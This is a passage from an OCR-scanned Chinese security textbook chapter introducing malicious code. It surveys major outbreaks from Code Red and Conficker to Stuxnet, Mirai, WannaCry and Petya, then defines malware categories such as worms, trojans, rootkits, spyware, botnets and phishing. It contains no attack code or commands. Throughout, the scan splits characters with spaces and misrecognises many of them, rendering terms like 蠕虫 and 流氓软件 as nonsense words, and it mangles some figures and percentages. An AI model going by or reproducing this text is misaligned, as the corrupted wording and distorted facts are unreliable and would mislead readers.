美国 中 央 情 报 局 .英国 国会 等 政府 机 构 及 多 个 路 国 公 司 的 电子 邮件 系统 都 遭 到 黎 击 。 根 据 
媒体 估计 , 爱 虫 病毒 造成 大 约 100 亿美 元 的 损失 。 

2001 年 7 月 中 旬 ,一 种 名 为 "红色 代码 ”的 恶意 代码 在 美国 大 面积 蔓延 ,这 个 专门 攻击 
服务 器 的 恶意 代码 攻击 了 日 宫 网 站 ,造成 了 全 世界 您 恢 。8 月 初 ,其 变种 “红色 代码 2” 针 对 
中 文系 统 做 了 修改 ,增强 了 对 中 文 网 站 的 攻击 能 力 ,开始 在 中 国 葛 延 。“ 红 色 代 码 ” 通 过 黑客 
攻击 手段 利用 服务 硕 软 件 的 漏洞 来 传播 ,造成 了 全 球 100 万 个 以 上 的 系统 被 攻陷 而 导致 瘫 
痪 。 这 是 恶意 代码 与 网 络 黑客 首次 结合 ,对 后 来 的 恶意 代码 产生 了 很 大 的 影响。 

2003 年 ,“2003 蠕虫 王 ” 在 亚洲 、 美 洲 、 澳 大 利 亚 等 地 迅速 传播 ,造成 了 全 球 性 的 网 络 灾 
害 。 其 中 受害 最 严重 的 无 疑 是 美国 和 韩国 这 两 个 Internet 发 达 的 国家 。 其 中 韩国 70% 的 
网 络 服务 器 处 于 瘫痪 状态 ,网 络 连 接 的 成 功率 低 于 10% ,整个 网 络 速度 极 慢 。 美 国 不 仅 公 
众 网 络 受 到 了 破坏 性 攻击 ,甚至 连 银行 网 络 系统 也 遭 到 了 破坏 ,使 全 国 1. 3 万 台 自 动 取款 机 
都 处 于 瘫痪 状态 。 

2004 年 是 蠕虫 泛滥 的 一 年 ,根据 中 国 计 算 机 病毒 应 急 处 理 中 心 的 调查 显示 ,2004 年 十 
大 流行 恶意 代码 都 是 蠕虫 ,它们 包括 网 络 天 空 (Worm. Netsky)、 高 波 (Worm. Agobot)、 爱 
情 后 门 (Worm. Lovgate)、 震 荡 波 (Worm. Sasser)、SCO 炸弹 (Worm. Novarg), 冲击 波 
(Worm. Blaster) 亚麻 (Worm. Bbeagle) ,小 邮差 (Worm. Mimail) .求职 信 (Worm. Klez)、 大 
无 极 (Worm. SoBig)。 


1.3.11 网 络 时 代 : 木马 


2005 一 2006 年 特洛伊 木马 流行 ,除了 BO2K .冰河 \ 灰 铝 子 等 经 典 木 马 外 ,其 变种 层 出 
不 穷 。 据 江 民 病毒 预警 中 心 监测 的 数据 显示 ,2006 年 1 一 6 月 全 国共 有 7 322 453 台 计 算 机 
感染 了 病毒 ,其 中 感染 木马 的 计算 机 2 384 868 台 , 占 病 毒 感 染 计 算 机 总 数 的 32. 56%。 

2008 年 11 月 ,出 现 了 一 种 名 为 “ 飞 客 "(英文 名 称 Conficker、Downup、Downadup 或 
Kido) 的 针对 Windows 操作 系统 的 蠕虫 病毒 。“ 飞 客 ” 蠕 虫 利 用 Windows RPC 远程 连接 调 
用 服务 存在 的 高 危 漏 洞 (MS08-067) 入 侵 互 联网 上 未 进行 有 效 防护 的 主机 ,通过 局 域 网 、U 
盘 等 方式 快速 传播 ,并且 会 停 用 感染 主机 的 一 系列 Windows 服务 。 与 传统 蠕虫 相 比 ,“ 飞 


第 1 章 恶意 代码 概述 7 


客 " 晴 虫 的 上 月 我 保护 能 力 大 大 增强 : 它 内 置 复杂 的 域名 生成 算法 ,产生 数 以 万 计 的 域名 供 黑 
客 选择 使 用 来 实施 控制 及 更 新 程序 ; 采用 P2P 机 制 极 大 地 提升 其 传播 能 力 ; 受到 感染 的 系 
统 会 将 Conficker 代码 不 断 更 新 ,其 终极 版 本 甚至 可 以 阻止 DNS 的 查找 能 力 , 禁 用 系统 的 
自动 更 新 , 杀 死 反 恶 意 软件 。 自 2008 年 以 来 ,“ 飞 客 ” 蠕 虫 衍生 了 多 个 变种 ,这 些 变 种 感染 了 
上 亿 台 主机 ,构建 了 一 个 庞大 的 攻击 平台 ,不 仅 能 够 用 于 大 范围 的 网 络 欺 诈 和 信息 锚 取 ,而 
且 能 够 被 利用 发 动 无 法 阻挡 的 大 规模 拒绝 服务 攻击 ,甚至 可 能 成 为 有 力 的 网 络 战 工具 。 虽 
然 “ 飞 客 ?” 蠕 虫 尚未 直接 被 用 于 发 动 针对 某 一 重要 信息 系统 的 大 规模 网 络 攻击 ,但 是 也 有 ” 飞 
客 ” 晴 虫 干扰 政府 和 军队 等 重要 部 门 正 常 运行 的 多 个 报道 。 例 如 ,2009 年 1 月 15 日 ,法 国 
海军 内 部 计算 机 系统 感染 “ 飞 客 ”蠕虫 ,随后 该 网 络 被 隔离 迫使 几 个 空军 基地 因 无 法 下 载 飞 
行 计 划 而 停 飞 ; 英国 国防 部 报道 ,“ 飞 客 ” 蠕 虫 感染 了 皇家 海军 军舰 .皇家 海军 潜艇 ,行政 办 
公 室 , 谢 菲 尔 德 医院 等 部 门 的 800 余 台 主机 ; 2009 年 2 月 2 日 ,德国 统一 武装 部 队 称 他 们 有 
约 100 台 主 机 被 感染 ; 2009 年 2 月 ,英国 曼彻斯特 议会 IT 系统 因 感 染 “ 飞 客 ” 蠕 虫 而 中 断 ， 
造成 约 150 万 英镑 的 损失 ; 2010 年 1 月 ,英国 曼彻斯特 警方 的 计算 机 系统 被 感染 ,致使 与 国 
家 警察 系统 中 断 连 接 三 天 ,曼彻斯特 警方 对 车 辆 和 人 员 的 例 行 检查 不 得 不 委托 其 他 地 区 警 
察 代 为 执行 。 


1.3.12 网 络 时 代 : 工业 互联 网 恶意 代码 


Stuxnet 蠕虫 病毒 ( 震 网 病毒 ,又 名 超级 工厂 病毒 ) 最 早出 现在 2010 年 6 月 ,是 世界 上 第 
一 个 包含 PLC Rootkit 的 计算 机 旺 虫 ,也 是 第 一 个 专门 针对 工业 控制 系统 编写 的 破坏 性 病 
毒 ,能 够 利用 Windows 系统 和 西门 子 SIMATIC WinCC 系统 的 7 个 漏洞 对 能 源 .电力 、 化 工 
等 关键 工业 基础 设施 进行 攻击 。 据 称 , 该 病毒 起 源 于 2006 年 前 后 由 时 任 美 国 总 统 小 布什 局 
动 的 “奥运 会 计划 ”。2008 年 ,奥巴马 上 任 后 下 令 加 速 该 计划 。 据 赛 门 铁 克 公司 的 统计 , 截 
止 到 2010 年 9 月 全 球 有 约 45 000 个 网 络 ,60% 的 个 人 计算 机 被 该 蠕虫 感染 , 近 60% 的 感染 
发 生 在 伊朗 ,其 次 为 印尼 ( 约 20%) 和 印度 ( 约 10%)。 据 报道 ,Stuxnet 蠕虫 病毒 感染 并 破坏 
了 伊朗 纳 坦 效 的 核 设 施 , 并 最 终 使 伊朗 的 布什 尔 核电 站 推迟 启动 。Stuxnet 蠕虫 病毒 还 令 
德黑兰 的 核 计 划 拖 后 了 两 年 。 


1.3.13 网 络 时 代 : 物 联网 恶意 代码 


随 着 近年 来 物 联网 概念 的 流行 ,大 量 的 智能 设备 不 断 地 接 入 互联 网 ,其 安全 脆弱 性 、 封 
闭 性 等 特点 成 为 黑客 争 相 夺取 的 资源 。 目 前 已 经 存在 大 量 针 对 物 联网 的 僵尸 网 络 ,如 
QBOT、Luabot、Bashlight、Zollard、Remaiten、KTN-RM 等 ,并 且 越 来 越 多 的 传统 僵尸 也 开 
始 加 入 到 这 个 行列 中 。 因 为 物 联 网 智能 设备 普遍 24 小 时 在 线 , 感 染 恶 意 程序 后 也 不 易 被 用 
户 察 觉 ,形成 三 稳定 ?的 攻击 源 。 

2016 年 年 底 , 因 美国 东海 岸 大 规模 断 网 事件 、 德 国电 信 大 量 用 户 访问 网 络 异 常事 件 ， 
Mirai 恶意 程序 受到 广泛 关注 。2016 年 10 月 21 日 ,Mirai 控制 的 僵尸 网 络 对 美国 域名 服务 
故 管 理 服 务 供应 商 Dyn 发 起 DDoS 攻击 ,导致 美国 多 个 城市 出 现 互联 网 次 痪 情况 ,包括 
Twitter、Paypal、Github 等 在 内 的 大 量 互 联网 知名 网 站 数 小 时 无 法 正常 访问 。2016 年 
11 月 28 日 前 后 德国 电信 遭遇 了 由 Mirai 僵尸 网 络 发 起 的 攻击 ,从 而 引发 了 大 范围 的 网 络 故 
障 ,2000 万 固定 网 络 用 户 中 大 约 有 90 万 个 路 由 需 发 生 故 障 ( 约 4.5%)。 在 2016 年 11 一 
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12 月 期 间 , 利 比 亚 反 复 遭 受 来 自 Mirai 僵尸 网 络 的 大 流量 .长 时 间 DDoS 攻击 。 在 被 攻击 期 
间 ,利比亚 全 国 的 网 络 均 处 于 脱 机 状态 ,对 金融 行业 造成 了 很 大 的 损害 。 据 统计 ,2016 年 11 
月 2 一 5 日 ,利比亚 遭受 的 攻击 流量 超过 了 500Gb/s。 

Mirai 是 一 款 典 型 的 利用 物 联 网 智能 设备 漏洞 进行 人 侵 渗 透 以 实现 对 设备 控制 的 恶意 
代码 。Mirai 通过 扫描 网 络 中 的 Telnet 等 服务 来 进行 传播 ,由 于 采用 高 级 SYN 扫描 ,扫描 
速度 提升 30 倍 以 上 ,提高 了 感染 速度 ; 一 旦 通过 Telnet 服务 进入 , 便 强 制 关 闭 Telnet 服 
务 , 以 及 其 他 SSH 和 Web 等 人 口 ,并 且 占 用 服务 端口 防止 这 些 服务 复活 ; 同时 强制 清除 其 
他 主流 的 IoT 僵尸 程序 ,如 QBOT、Zollard、Remaiten Bot .anime Bot 以 及 其 他 僵尸 独占 资 
源 ; 还 会 过 滤 掉 通用 电气 公司 惠普 公司 .美国 国家 邮政 局 .国防 部 等 公司 和 机 构 的 IP, 防 止 
无 效 感染 。 据 统计 ,到 2016 年 10 月 26 日 ,全球 感 染 Mirai 的 设备 超过 100 万 台 , 其 中 美国 
感染 设备 有 418 592 台 , 中 国内 地 有 145778 台 , 澳 大 利 亚 94 912 台 , 日 本 和 中 国 香港 分 别 为 
47 198 和 44 386 人 台 。 


1.3.14 网 络 时 代 : 勒索 型 恶意 代码 


2016 年 起 ,IBM、Symantec、360 等 国内 外 多 家 安全 厂商 纷纷 开始 关注 勒索 病毒 的 威胁 。 
2016 年 12 月 ,360 互联 网 安全 中 心 发 布 了 《2016 项 诈 者 病毒 威胁 形势 分 析 报 告 (年 报 )》。 
该 报告 指出 ,2016 年 ,全 国 至 少 有 497 万 多 台 用 户 计 算 机 遭 到 了 勒索 病毒 攻击 ,成 为 对 网 民 
直接 威胁 最 大 的 一 类 木马 病毒 。 

2017 年 5 月 12 日 ,WannaCry 勒索 病毒 事件 全 球 爆 发 ,该 病毒 以 类 似 于 蠕虫 的 方式 传 
播 ,攻击 主机 并 加 密 主 机 上 存储 的 文件 ,然后 要 求 以 比特 币 的 形式 支付 赎金 。 至 少 150 个 国 
家 、30 万 名 用 户 中 招 , 影 响 到 金融 、 能 源 、 医 疗 等 众多 行业 ,造成 损失 达 80 亿美 元 。 

2017 年 6 月 ,一 个 名 为 Petya 的 勒索 病毒 再 度 肆 虐 全 球 ,包括 乌克兰 首都 国际 机 场 、 乌 
克 兰 国家 储蓄 银行 邮局、 地铁、 船舶 公司 ,俄罗斯 的 石油 和 天 然 气 巨头 Rosneft, 丹 麦 的 航 
运 巨头 马士基 公司 ,美国 制药 公司 默 克 公司 .美国 律师 事务 所 DLA Piper, 乌 克 兰 一 些 商 业 
银行 以 及 部 分 私人 公司 零售 企业 和 政府 系统 ,甚至 是 核能 工厂 都 遭 到 了 攻击 。 与 
WannaCry 相 比 ,该 病毒 会 加 密 NTFS 分 区 ,覆盖 MBR ,阻止 机 器 正常 启动 ,影响 更 加 严重 。 
2017 年 10 月 ,勒索 病毒 BadRabbit 在 东欧 爆发 ,导致 乌克兰、 俄罗斯 等 企业 及 基础 设施 受 
灾 严 重 。 

此 外 ,2017 年 ,搜索 引擎 Elasticsearch 、 围 国 网 络 托管 公司 Nayana 、 通 用 汽车 制造 中 心 
等 也 先后 遭遇 勒索 病毒 攻击 。2017 年 甚至 还 出 现 了 一 款 冒 充 “ 王 者 荣光 辅助 工具 ”的 效 击 
移动 设备 的 勒索 病毒 。 有 媒体 戏称 2017 年 为 “被 勒索 ”的 一 年 。 

2018 年 4 月 ,Check Point 公司 在 发 布 的 (全球 恶意 软件 威胁 影响 指数 ) 中 公布 了 3 月 
份 十 大 最 受 网 络 犯罪 分 子 “ 欢 迎 ” 的 恶意 软件 。 

(1) Coinhive: 一 款 加 密 贷 币 挖 矿 恶 意 软 件 , 会 将 JavaScript 加 密 货 币 控 矿 脚本 租 入 在 
被 攻击 网 站 的 网 页 中 。 当 访客 访问 该 网 站 时 ,会 利用 访客 的 计算 机 CPU 资源 来 挖掘 加 密 
货币 ,占用 大 量 的 系统 资源 ,最 终 导 致 网 站 访客 的 计算 机 性 能 下 降 。 

(2) Rig EK( 漏 洞 利用 工具 包 ,Exploit Kit) : 漏洞 利用 工具 ,2014 年 首次 出 现 , 提 供 对 
Flash、Java、Silverlight 和 Internet Explorer 的 漏洞 利用 ,曾经 一 度 成 为 Exploit Kit 市 场 的 
领先 者 。 
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(3) CryptoLoot: 与 Coinhive 类 似 的 JS 挖 矿 引 擎 ,也 是 在 有 访问 量 的 网 站 中 能 入 加 密 储 
币 控 矿 脚本 ,利用 访客 的 计算 机 CPU 资源 进行 加 密 儿 币 挖 掘 。 不 过 CryptoLoot 平台 的 佣金 比 
Coinhive 平台 的 佣金 低 很 多 ,这 可 以 大 大 降低 以 挖 矿 为 营利 目标 的 黑色 产业 链 成 本 。 

(4) RoughTed: 广告 恶意 软件 ,利用 指纹 识别 和 广告 拦截 器 绕 过 技术 ,RoughTed 能 够 
大 规模 传播 网 络 诈骗 、 广 告 软件 、 汤 洞 工 具 包 与 勒索 软件 相关 的 恶意 网 站 或 者 链接 ,可 用 于 
攻击 任意 类 型 的 平台 和 操作 系统 。 

(5) JSEcoin: 也 是 与 Coinhive 类 似 的 JS 挖 矿 引 擎 ,利用 访客 的 计算 机 CPU 资源 来 挖 
掘 数字 货币 进行 件 利 。 但 是 JSEcoin 会 将 CPU 使 用 率 限 制 在 15 中 一 25%% ,并 且 始 终 显示 
隐私 声明 ,为 用 户 提 供 退 出 选项 (可 选择 不 提供 运算 服务 ) 。 

(6) Fireball: 恶意 软件 下 载 程序 ,使 用 了 防 病毒 规避 技术 ,通过 捆绑 免费 软件 的 方式 ， 
安装 浏览 器 插件 ,从 而 完全 控制 受害 者 的 Web 浏览 器 ,把 它们 变 成 “僵尸 ” ,并 让 攻击 者 对 受 
害 者 的 流量 进行 监控 , 祝 取 数据 。 人 允许 攻击 者 在 受害 者 设备 上 执行 任意 代码 .进行 登录 凭证 
神 取 、 恶 意 软件 安装 等 广泛 操作 。 

(7) Andromeda: 又 名 Gamarue 或 Wauchos ,是 一 种 模块 化 木马 ,主要 被 用 作 后 门 ,在 
受 感染 的 计算 机 上 下 载 其 他 恶意 软件 ,并 可 进行 修改 以 创建 不 同类 型 的 僵尸 网 络 。 自 2011 
年 开始 活跃 ,该 僵尸 工具 来 源 于 俄罗斯 。 

(8) XMRig: 加 密 货币 挖 矿 恶意 软件 ,一 款 用 于 挖掘 门 罗 币 的 开源 CPU 挖 矿 软件 ,于 
2017 年 5 月 首次 被 用 于 恶意 攻击 活动 。 

(9) Necurs: 世界 上 最 大 的 恶意 僵尸 网 络 之 一 ,用 于 通过 垃圾 邮件 传播 恶意 软件 ,有 多 
个 恶意 家 族 木 马 的 传播 被 证 明 或 怀疑 与 Necurs 木马 构建 的 僵尸 网 络 有 关 , 曾 被 称 为 “恶意 
木马 传播 的 基础 设施 ”。 

(10) Conficker: 允许 远程 操作 和 恶意 软件 下 载 的 蠕虫 。 受 感染 的 设备 由 僵尸 网 络 控 
制 ,通过 连接 Command&.Control 服务 器 以 接收 指令 。 


1.4 恶意 代码 的 种 类 


在 恶意 代码 技术 的 发 展 过 程 中 ,其 特征 不 断 变化 ,恶意 代码 的 种 类 也 不 断 增 加 。 根 据 国 
内 外 多 年 来 对 恶意 代码 的 研究 成 果 可 知 ,恶意 代码 主要 包括 普通 计算 机 病毒 .蠕虫 .特洛伊 
木马 、 Rootkit 工具 流氓 软件 .间谍 软件 .恶意 广告 .逻辑 炸弹 、 僵 尸 网 络 、 网 络 钓鱼 .恶意 脚 
本 垃圾 信息 、 勒 索 软 件 .移动 终端 恶意 代码 等 。 

1. 普通 计算 机 病毒 

普通 计算 机 病毒 是 指 编制 或 者 在 计算 机 程序 中 插入 的 破坏 计算 机 功能 或 者 破坏 数据 ， 
影响 计算 机 使 用 并 且 能 够 自我 复制 的 一 组 计算 机 指令 或 者 程序 代码 。 也 就 是 传统 意义 上 的 
计算 机 病毒 ,主要 包括 引导 区 型 病毒 、 文 件 型 病毒 以 及 混合 型 病毒 。 感 染 引 导 区 的 病毒 是 较 
日 的 一 种 病毒 ,主要 是 感染 DOS 操作 系统 的 引导 过 程 。 文 件 型 病毒 分 为 感染 可 执行 文件 的 
病毒 和 感染 数据 文件 的 病毒 ,前 者 主要 指 感染 COM 文件 或 EXE 文件 的 病毒 ,如 CIH 病 
毒 ,后 者 主要 指 感染 Word、PDF 等 数据 文件 的 病毒 ,如 宏 病 毒 等 。 混 合 型 病毒 主要 指 那 些 
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既 能 感染 引导 区 又 能 感染 文件 的 病毒 。 

尽管 有 些 文献 把 特洛伊 木马 、 蠕 虫 等 都 划 归 到 计算 机 病毒 概念 下 ,但 这 种 分 类 法 并 不 符 
合计 算 机 病毒 的 定义 。 因 此 ,本 书 所 指 的 计算 机 病毒 仅 包 括 引 导 区 型 病毒 、 文 件 型 病毒 以 及 
混合 型 病毒 。 

2. 蠕虫 

提起 蠕虫 ,给 读者 印象 最 深 的 就 是 冲击波” 震荡 波 ”“ 红 色 代 码 ”“ 尼 姆 达 ” 等 名 称 。 这 
些 蠕 虫 在 2003 年 .2004 年 达到 高 发 期 ,并 给 整个 信息 安全 领域 留 下 了 不 可 磨灭 的 印记 。 

尽管 蠕虫 的 爆发 期 是 从 2000 年 后 才 开 始 的 ,但 “蠕虫 ”这 个 名 词 由 来 已 入 。 在 1982 年 ， 
Shock 和 Hupp 根据 The Shockwave Rider 一 书 中 的 概念 提出 了 “蠕虫 ”(Worm) 程 序 的 思 
想 。1988 年 , 莫 里 斯 把 一 个 被 称 为 “蠕虫 ”的 恶意 代码 送 进 了 美国 的 计算 机 网 络 ,正式 宣告 
了 蠕虫 的 存在 。 

蠕虫 作为 恶意 代码 的 一 种 ,是 指 能 日 我 复制 和 广泛 传播 ,以 占用 系统 和 网 络 资源 为 主要 
目的 的 恶意 程序 , 它 的 传播 通常 不 需要 所 谓 的 激活 。 它 通过 分 布 式 网 络 来 散播 特定 的 信息 
或 错误 ,进而 造成 网 络 服务 遭 到 拒绝 并 发 生死 锁 。 一 般 认 为 ,蠕虫 是 一 种 通过 网 络 传播 的 恶 

恶意 代码 , 它 具 有 传播 性 .隐蔽 性 、 破 坏 性 等 特性 。 此 外 ,是 虫 还 具有 目 己 特有 的 一 些 特 
征 ,如 不 利用 文件 寄生 (有 的 只 存在 于 内 存 中 ) ,对 网 络 造成 拒绝 服务 ,和 黑客 技术 相 结 合 等 。 
在 破坏 程度 上 ,蠕虫 非常 强大 ,借助 于 发 达 的 Internet, 蠕 虫 可 以 在 短 短 的 数 小 时 内 蔓延 至 
整个 互联 网 ,并 造成 网 络 次 痪 。 

3. 特洛伊 木马 

木马 的 全 称 是 特洛伊 木马 (Trojan Horse), 原 指 古 希腊 士兵 藏 在 木马 内 进入 特洛伊 城 
从 而 占领 该 城市 的 故事 。 在 网 络 安全 领域 中 ,特洛伊 木马 是 一 种 与 远程 计算 机 建立 连接 ,使 
远程 计算 机 能 够 通过 网 络 控制 用 户 计算 机 系统 并 且 可 能 造成 用 户 信息 损失 、 系 统 损坏 甚至 
竣 痪 的 程序 。 

一 个 完整 的 木马 系统 由 便 件 部 分 、 软 件 部 分 和 具体 连接 部 分 组 成 。 

(1) 硬件 部 分 : 建立 木马 连接 所 必需 的 人 硬件 实体 ,包含 有 控制 端 \ 服 务 端 和 Internet。 
控制 端 指 对 服务 端 进行 远程 控制 的 一 方 。 服 务 端 指 被 控制 问 远 程控 制 的 一 方 。Internet 是 
控制 端 对 服务 端 进 行 远 程控 制 以 及 数据 传输 的 网 络 载体 。 

(2) 软件 部 分 : 实现 远程 控制 所 必需 的 软件 程序 ,包含 有 控制 端 程 序 、 木 马 程 序 和 木马 
配置 程序 。 控 制 端 程序 是 控制 端 用 于 提供 远程 控制 服务 端的 程序 。 木 马 程序 是 光伏 在 服务 
端 内 部 ,获取 其 操作 权限 的 程序 。 木 马 配置 程序 用 于 设置 木马 程序 的 端口 号 .触发 条 件 、 木 
马 名 称 等 ,并 使 其 在 服务 端 隐藏 得 更 隐蔽 的 程序 。 

(3) 连接 部 分 : 通过 Internet 在 服务 端 和 控制 端 之 间 建 立 一 条 木马 通道 所 必需 的 元 素 。 
包含 有 控制 端 和 服务 端的 IP 以 及 相应 端口 。 控 制 端 IP 和 服务 端 IP 即 控 制 端 和 服务 端的 
网 络 地 址 ,也 是 木马 进行 数据 传输 的 始 发 地 和 目的 地 。 控 制 庙 端口 和 木马 端口 即 控制 端 和 
服务 端的 数据 入 口 ,通过 这 个 入 口 ,服务 端 数 据 可 直达 控制 端 程序 或 木马 程序 。 

4. Rootkit 工具 


Rootkit 是 攻击 者 用 来 隐藏 上 自己 的 踪迹 和 保留 Root 访问 权限 的 工具 。 在 众多 Rootkit 
中 ,针对 SunOS 和 Linux 两 种 操作 系统 的 Rootkit 最 多 。 所 有 的 Rootkit 基本 上 都 是 由 几 
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个 独立 的 程序 组 成 的 。 一 个 典型 Rootkit 包括 以 下 内 容 。 

(1) 网 络 嗅 探 程序 : 通过 网 络 嗅 探 , 获 得 网 络 上 传输 的 用 户 名 、 账 户 和 密码 等 信息 。 

(2) 特洛伊 木马 程序 : 为 攻击 者 提供 后 门 。 例 如 inetd 或 者 login。 

(3) 隐藏 攻击 者 的 目录 和 进程 的 程序 : 例如 ps、netstat、rshd 和 1s 等 。 

(4) 日 志清 理工 具 : 例如 zap、zap2 或 者 z2 ,攻击 者 使 用 这 些 清理 工具 删除 wtmp、utmp 
和 lastlog 等 日 志文 件 中 有 关 自 己 行踪 的 条 目 。 

此 外 ,一 些 复杂 的 Rootkit 还 可 以 同 攻 击 者 提供 telnet、Shell 和 finger 等 服务 。 还 可 能 
包括 一 些 用 来 清理 /var/log 和 /var/adm 目录 中 其 他 文件 的 一 些 脚 本 。 

5. 流氓 软件 9 

“ 流 妃 软件 ?是 20 世纪 的 一 个 新 生词 汇 ,是 一 个 源 日 网 络 的 词汇 。 近 年 来 ,一 些 流 谍 软 
件 引 起 了 用 户 和 媒体 的 强烈 关注 。 流 谍 软 件 的 典型 表现 是 采用 特殊 手段 频繁 弹出 广告 窗 
口 ,危及 用 户 隐私 ,严重 干扰 用 户 的 日 常 工作 .数据 安全 和 个 人 隐私 。 

如 果 说 计算 机 病毒 是 由 小 团体 或 者 个 人 秘密 地 编写 和 散播 的 ,那么 流氓 软件 的 创作 者 
则 涉嫌 很 多 知名 企业 和 团体 。 这 些 软件 在 计算 机 用 户 中 引起 了 公愤 ,许多 用 户 指 责 它 们 为 
“彻头彻尾 的 流 谍 软 件 ”。 流 谍 软 件 的 泛滥 ,成 为 互联 网 安全 的 新 威胁 。 根据 琪 星 发 布 的 
《2006 上 半年 电脑 病毒 疫情 & 互联 网 安全 报告 ) 的 数据 显示 ,2006 年 上 半年 ,中 国 流 谍 软 件 
的 危害 已 经 超过 了 普通 计算 机 病毒 。 

迄今 为 止 , 流 谍 软 件 还 没有 一 个 公认 的 统一 定义 。 中 国 反 流 谍 软件 联盟 和 奇 虎 公司 都 
试图 统一 流氓 软件 的 定义 ,但 都 没有 成 功 。 以 下 为 流氓 软件 的 两 种 定义 。 

第 一 种 定义 : 流氓 软件 是 指 具 有 一 定 的 实用 价值 但 具备 计算 机 病毒 和 黑客 部 分 行为 特 
征 的 软件 。 它 处 于 合法 软件 和 计算 机 病毒 之 间 的 灰色 地 带 , 它 会 造成 无 法 钙 载 并 强行 弹出 
广告 和 窃取 用 户 的 私人 信息 等 危害 。 

第 二 种 定义 : 流氓 软件 是 介 于 病毒 和 正规 软件 之 间 的 软件 ,同时 具备 正常 功能 (下 载 、 
媒体 播放 等 ) 和 恶意 行为 (弹出 广告 . 开 后 门 ) ,给 用 户 带 来 实质 危害 。 它 们 往往 采用 特殊 手 
段 频繁 弹出 广告 窗口 ,危及 用 户 隐 私 ,严重 干扰 用 户 的 日 常 工作 、 数 据 安 全 和 个 人 隐私 。 

总 之 , 流 谍 软 件 是 对 网 络 上 散播 的 符合 如 下 条 件 的 软件 的 一 种 称呼 。 

(1) 未 经 用 户 许可 ,或 者 利用 用 户 玲 忽 , 或 者 利用 用 户 缺 乏 相 关 知 识 ,秘密 收 集 用 户 个 
人 信息 ,秘密 和 隐私 。 

(2) 有 侵害 用 户 信 息 和 财产 安全 的 潜在 因素 或 者 隐患 。 

(3) 强行 弹出 广告 ,或 者 其 他 干扰 用 户 并 占用 系统 资源 的 行为 。 

(4) 强行 修改 用 户 软 件 设 置 , 例 如 浏览 器 主页 ,软件 自动 启动 选项 ,安全 选项 。 

(5) 采用 多 种 社会 和 技术 手段 ,强行 或 者 秘密 安装 ,并 抵制 卸载 。 

6. 间谍 软件 


间谍 软件 (Spyware) 是 一 种 能 够 在 计算 机 使 用 者 无 法 察觉 或 给 计算 机 使 用 者 造成 安全 
假象 的 情况 下 ,秘密 收集 计算 机 信息 并 把 它们 传播 给 他 人 的 程序 。 间 谍 软 件 可 以 像 普通 计 
算 机 病毒 一 样 进入 计算 机 或 绑 定 安装 程序 而 进入 计算 机 。 间 谍 软 件 经 篆 会 在 未 经 用 户 同 意 
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或 者 用 户 没 有 意识 到 的 情况 下 ,以 IE 工具 条 ,快捷 方式 、 作 为 驱动 程序 下 载 或 由 于 单 击 一 些 
欺骗 的 弹出 式 窗口 选项 等 其 他 用 户 无 法 察觉 的 形式 ,被 安装 在 用 户 的 计算 机 内 。 

虽然 那些 被 安装 了 间谍 软件 的 计算 机 使 用 起 来 和 正常 计算 机 并 没有 太 大 区 别 , 但 用 户 
的 隐私 数据 和 重要 信息 会 被 那些 间谍 软件 捕获 ,这 些 信 息 将 被 发 送 给 互联 网 另 一 端的 操纵 
者 ,甚至 这 些 间谍 软件 还 能 使 黑客 操纵 用 户 的 计算 机 ,或 者 说 这 些 有 “后 门 ? 的 计算 机 都 将 成 
为 黑客 和 病毒 攻击 的 重要 目标 和 潜在 目标 。 

7. 恶意 广告 

恶意 广告 也 称 为 广告 软件 ,通常 包括 间谍 软件 的 成 分 ,也 可 以 认为 是 恶意 软件 。 广 告 软 
件 是 指 未 经 用 户 允 许 , 下 载 并 安装 或 与 其 他 软件 捆绑 通过 弹出 式 广告 或 以 其 他 形式 进行 商 
业 广 告 宣传 的 程序 。 安 法 广告 软 件 之 后 ,往往 造成 系统 运行 缓慢 或 系统 异常 。 

8. 逻辑 炸弹 

逻辑 炸弹 (Logic Bomb) 是 合法 的 应 用 程序 ,只 是 在 编程 时 被 故意 写作 某 种 “恶意 功 
能 ”。 例 如 ,作为 某 种 版 权 保 护 方案 , 某 个 应 用 程序 有 可 能 会 在 运行 几 次 后 就 在 便 盘 中 将 其 
自身 删除 ; 某 个 程序 员 可 能 在 他 的 程序 中 放置 某 些 多 余 的 代码 ,以 使 程序 运行 时 对 某 些 系 
统 产生 恶意 操作 。 在 大 的 项 目 中 ,如 果 代 码 检查 措施 有 限 , 被 植 人 逻辑 炸弹 的 可 能 性 是 很 
大 的 。 

9. 后 门 


后 门 (Back Door) 是 指 绕 过 安全 性 控制 而 获取 对 程序 或 系统 访问 权 的 方法 。 在 软件 的 
开发 阶段 ,程序 员 和 常常 会 在 软件 内 创建 后 门 以 方便 修改 程序 中 的 缺陷 。 如 果 后 门 被 其 他 人 
知道 ,或 是 在 发 布 软件 之 前 没有 被 删除 ,那么 它 就 成 了 安全 隐 吓 。 

10. 僵尸 网 络 

僵尸 网 络 (Botnet) 是 指 采 用 一 种 或 多 种 传播 手段 ,使 大 量 主机 感染 Bot 程序 (僵尸 程 
序 ) ,从 而 在 控制 者 和 被 感 当 主机 之 间 形 成 一 个 可 实现 一 对 多 控制 的 网 络 。 

攻击 者 通过 各 种 途径 传播 僵尸 程序 感染 互联 网 上 的 大 量 主机 ,而 被 感染 的 主机 将 通过 
一 个 控制 信道 接收 攻击 者 的 指令 ,组 成 一 个 僵尸 网 络 。 网 络 中 被 寄宿 了 Bot 程序 的 主机 被 
称 为 “肉鸡 ”。 

11. 网 络 钓鱼 

网 络 钓鱼 (Phishing 是 Phone 和 Fishing 的 组 合 词 ,与 钓鱼 的 英语 Fishing 发 音 相 近 , 又 
名 钓鱼 法 或 钓鱼 式 攻 击 ) 是 通过 发 送 大 量 声称 来 自 于 权威 机 构 的 欺骗 性 信息 来 引诱 信息 接 
收 者 给 出 敏感 信息 (如 用 户 名 .口令 .账号 ID.ATM PIN 码 、 信 用 卡 等 ) 的 一 种 攻击 方式 。 最 
典型 的 网 络 钓鱼 攻击 是 将 收 信 人 引诱 到 一 个 通过 精心 设计 与 目标 组 织 的 网 站 非常 相似 的 钓 
鱼网 站 上 ,并 获取 收 信 人 在 此 网 站 上 输入 个 人 敏感 信息 ,通常 这 个 攻击 过 程 不 会 让 受害 者 警 
觉 。 网 络 钓鱼 是 “社会 工程 攻击 ?的 一 种 具体 表现 形式 。 

12. 恶意 脚本 

恶意 脚本 是 指 利 用 脚本 语言 编写 的 以 危害 或 者 损害 系统 功能 \ 干 扰 用 户 正常 使 用 为 目 
的 的 任何 脚本 程序 或 代码 片段 ,用 于 编制 恶意 脚本 的 脚本 语言 包括 Java 攻击 小 程序 (Java 
